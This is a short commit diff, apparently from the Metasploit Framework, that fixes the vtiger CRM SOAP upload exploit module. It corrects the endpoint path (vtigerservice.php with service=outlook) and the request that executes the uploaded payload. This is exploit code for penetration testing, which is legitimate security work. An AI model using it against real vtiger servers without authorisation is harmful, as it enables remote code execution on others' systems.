Land rapid7#2998, @bit4bit's fix for the vtigercrm exploit

jvazquez-r7 · jvazquez-r7 · commit 998fa0691219 · 2014-02-20T08:36:05.000-06:00
diff --git a/modules/exploits/multi/http/vtiger_soap_upload.rb b/modules/exploits/multi/http/vtiger_soap_upload.rb
@@ -98,7 +98,7 @@ def exploit
     end
 
     print_status("#{peer} - Executing payload...")
-    send_request_cgi({'uri' => normalize_uri(target_uri.path, 'soap', file_name)}, 0)
+    send_request_cgi({'uri' => normalize_uri(target_uri.path, file_name)}, 0)
   end
 
   def add_attachment_soap(file_name, file_data)
@@ -170,8 +170,9 @@ def check_email_soap(user_name = "", session = "")
 
   def send_soap_request(soap_data)
     res = send_request_cgi({
-      'uri'      => normalize_uri(target_uri.path, 'soap', 'vtigerolservice.php'),
+      'uri'      => normalize_uri(target_uri.path, 'vtigerservice.php'),
       'method'   => 'POST',
+      'vars_get' => { 'service' => 'outlook' },
       'ctype'    => 'text/xml; charset=UTF-8',
       'data'     => soap_data
     })
